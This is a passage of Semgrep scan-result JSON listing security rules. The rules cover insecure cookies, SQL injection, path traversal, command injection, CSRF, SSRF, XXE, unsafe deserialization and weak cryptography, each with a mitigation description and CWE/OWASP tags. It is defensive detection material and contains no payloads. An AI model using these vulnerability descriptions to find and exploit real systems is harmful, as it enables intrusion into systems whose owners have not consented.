javascript.express.express-fs-filename.express-fs-filename"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","id":"python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","name":"python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option."},"help":{"markdown":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql)\n - [https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm](https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column)\n","text":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option."},"helpUri":"https://semgrep.dev/r/python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","id":"python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","name":"python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library."},"help":{"markdown":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","id":"python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","name":"python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module](https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","id":"python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","name":"python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"help":{"markdown":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite)\n - [https://stackoverflow.com/questions/42717210/samesite-cookie-in-java-application](https://stackoverflow.com/questions/42717210/samesite-cookie-in-java-application)\n","text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","id":"java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","name":"java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering."},"help":{"markdown":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure)\n - [https://cwe.mitre.org/data/definitions/209.html](https://cwe.mitre.org/data/definitions/209.html)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design/](https://owasp.org/Top10/A04_2021-Insecure_Design/)\n","text":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","id":"csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","name":"csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","properties":{"precision":"very-high","tags":["CWE-209: Generation of Error Message Containing Sensitive Information","HIGH CONFIDENCE","OWASP-A04:2021 - Insecure Design","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"help":{"markdown":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","id":"python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","name":"python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","properties":{"precision":"very-high","tags":["CWE-454: External Initialization of Trusted Variables or Data Stores","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","id":"python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","name":"python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2)\n - [https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py](https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py)\n - [https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings](https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","id":"python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","name":"python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-command-injection.laravel-command-injection)\n - [https://www.php.net/manual/en/ref.exec.php](https://www.php.net/manual/en/ref.exec.php)\n - [https://www.php.net/manual/en/ref.filesystem.php](https://www.php.net/manual/en/ref.filesystem.php)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-command-injection.laravel-command-injection","id":"php.laravel.security.laravel-command-injection.laravel-command-injection","name":"php.laravel.security.laravel-command-injection.laravel-command-injection","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-command-injection.laravel-command-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties."},"help":{"markdown":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.remote-property-injection.remote-property-injection)\n - [https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n","text":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.remote-property-injection.remote-property-injection","id":"javascript.express.security.audit.remote-property-injection.remote-property-injection","name":"javascript.express.security.audit.remote-property-injection.remote-property-injection","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.remote-property-injection.remote-property-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection"},"help":{"markdown":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.conn_recv.multiprocessing-recv)\n - [https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection](https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection)\n","text":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.conn_recv.multiprocessing-recv","id":"python.lang.security.audit.conn_recv.multiprocessing-recv","name":"python.lang.security.audit.conn_recv.multiprocessing-recv","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.conn_recv.multiprocessing-recv"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`."},"help":{"markdown":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.java-jwt.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`."},"helpUri":"https://semgrep.dev/r/kotlin.java-jwt.jwt-none-alg.jwt-none-alg","id":"kotlin.java-jwt.jwt-none-alg.jwt-none-alg","name":"kotlin.java-jwt.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.java-jwt.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information."},"help":{"markdown":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.unvalidated-password.unvalidated-password)\n - [https://docs.djangoproject.com/en/3.0/topics/auth/passwords/#module-django.contrib.auth.password_validation](https://docs.djangoproject.com/en/3.0/topics/auth/passwords/#module-django.contrib.auth.password_validation)\n","text":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.unvalidated-password.unvalidated-password","id":"python.django.security.audit.unvalidated-password.unvalidated-password","name":"python.django.security.audit.unvalidated-password.unvalidated-password","properties":{"precision":"very-high","tags":["CWE-521: Weak Password Requirements","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.unvalidated-password.unvalidated-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256"},"help":{"markdown":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://pages.nist.gov/800-63-3/sp800-63b.html#sec5](https://pages.nist.gov/800-63-3/sp800-63b.html#sec5)\n","text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256"},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","id":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","name":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this."},"help":{"markdown":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled)\n - 